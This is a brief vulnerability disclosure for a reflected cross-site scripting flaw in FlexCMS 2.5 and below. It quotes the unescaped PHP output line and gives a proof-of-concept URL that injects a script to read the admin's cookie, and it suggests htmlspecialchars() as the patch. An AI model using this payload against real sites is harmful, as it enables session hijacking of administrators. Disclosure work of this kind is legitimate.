FlexCMS versions 2.5 and below suffer from a cross site scripting vulnerability.
c746b1b2dda11944f09900c41590192734b06a754c330cc44d0f6b8e096590e3
----------------------------------------------------------------
Script : FlexCMS <= 2.5
Type : Cross Site Scripting Vulnerability
Alert : Low
----------------------------------------------------------------
Download From : http://www.flexcms.com/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerability :
File Name : inc-core-admin-editor-previouscolorsjs.php
Vulnerable Variable : PreviousColorsString
Send Method : GET
Register_globals : On
Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');';
Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script>
Attacker can hijack admin cookie with this vulnerability ....
Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ...
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------